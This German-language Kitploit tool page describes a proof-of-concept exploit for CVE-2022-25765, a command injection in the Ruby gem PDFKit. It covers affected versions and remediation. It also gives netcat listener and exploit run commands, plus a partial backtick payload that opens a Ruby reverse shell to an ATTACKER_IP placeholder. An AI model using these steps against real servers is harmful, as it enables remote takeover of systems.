Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/lowercasenumbers/cve-2022-25765
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHublowercasenumbers/cve-2022-25765

CVE-2022-25765

Exploit for CVE-2022-25765

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-25765 Exploit

Ein kleiner PoC-Exploit für CVE-2022-25765, PDFkit-Befehlseinschleusung

Verwendung

  1. Starten Sie einen Netcat-Listener auf Ihrem Angriffsrechner:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Führen Sie den Exploit aus:

    root@kitploit:~
    python cve-2022-25765.py -t http://TARGET_IP:PORT -l YOUR_IP -p YOUR_PORT
    

Beispiel:

root@kitploit:~
python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444

Parameter:

  • -t, --target: Ziel-URL, die angreifbares PDFKit ausführt
  • -l, --lhost: Ihre IP-Adresse für die Reverse-Shell-Verbindung
  • -p, --lport: Ihr Port für die Reverse-Shell-Verbindung (muss mit Ihrem Netcat-Listener übereinstimmen)

Schwachstelleninformationen

CVE ID: CVE-2022-25765 CVSS v3.1 Bewertung: 9.8 (Kritisch) EPSS Bewertung: 71.381% (99. Perzentil) CWE: CWE-77 - Unzureichende Neutralisierung spezieller Elemente in einem Befehl

Betroffene Versionen

  • Anfällig: PDFKit 0.0.0 - 0.8.6
  • Behoben: PDFKit 0.8.7.2+

Beschreibung

PDFKit ist ein Ruby-Gem, das HTML mit dem Befehlszeilentool wkhtmltopdf in PDF konvertiert. Die Schwachstelle besteht darin, wie PDFKit URL-Parameter behandelt, bevor sie zur PDF-Erstellung an System-Shell-Befehle übergeben werden.

Technische Details

Die Schwachstelle befindet sich in lib/pdfkit/source.rb, wo die URL-Bereinigung nicht ordnungsgemäß implementiert ist:

root@kitploit:~
def shell_safe_url
  url_needs_escaping? ? URI::DEFAULT_PARSER.escape(@source) : @source
end

Das Problem:

  1. PDFKit verwendet fehlerhafte Logik, um zu bestimmen, ob eine URL escaped werden muss
  2. Shell-Metazeichen (Backticks, Semikolons, Pipes usw.) können diese Prüfung umgehen
  3. Nicht bereinigte URLs werden direkt an Shell-Befehle übergeben, die wkhtmltopdf aufrufen
  4. Angreifer können beliebige Befehle einschleusen, die auf dem Server ausgeführt werden

Angriffsvektor:

  • Komplexität: Niedrig
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Netzwerkzugriff: Erforderlich

Wie dieser Exploit funktioniert

Dieser PoC nutzt die Schwachstelle aus, indem:

  1. Eine bösartige URL injiziert wird, die eine Backtick-Befehlsersetzung enthält
  2. Die Nutzlast: http://ATTACKER_IP:PORT/?name=%20` ruby -rsocket...`'
  3. PDFKit versäumt es, die Backticks im URL-Parameter zu bereinigen
  4. Wenn wkhtmltopdf die URL verarbeitet, führt die Shell die Ruby-Reverse-Shell aus
  5. Das Zielsystem verbindet sich zurück mit dem Listener des Angreifers

Auswirkungen

  • Vertraulichkeit: Hoch - Vollständiger Systemzugriff
  • Integrität: Hoch - Möglichkeit, beliebige Dateien zu ändern
  • Verfügbarkeit: Hoch - Potenzial für Systemstörungen

Voraussetzungen für eine erfolgreiche Ausnutzung

Auf dem Zielsystem:

  • Angreifbare PDFKit-Version (< 0.8.7.2)
  • Ruby installiert (erforderlich für die Reverse-Shell-Nutzlast)
  • Anwendung akzeptiert benutzergesteuerte URLs, die an PDFKit übergeben werden
  • Keine Egress-Filterung, die ausgehende Verbindungen blockiert

Behebung

  1. Aktualisieren Sie PDFKit auf Version 0.8.7.2 oder höher
  2. Eingabevalidierung: Implementieren Sie eine strenge Positivliste für URL-Eingaben
  3. Sandboxing: Führen Sie PDFKit-Prozesse in isolierten Containern mit minimalen Berechtigungen aus
  4. Netzwerksegmentierung: Beschränken Sie ausgehende Verbindungen von PDF-Generierungsdiensten
  5. WAF-Regeln: Setzen Sie Regeln zur Erkennung von Shell-Metazeichen in URL-Parametern ein

Referenzen

  • NVD - CVE-2022-25765
  • GitHub Advisory GHSA-rhwx-hjx2-x4qr
  • PDFKit Issue #507
  • RubySec Advisory
Tool herunterladen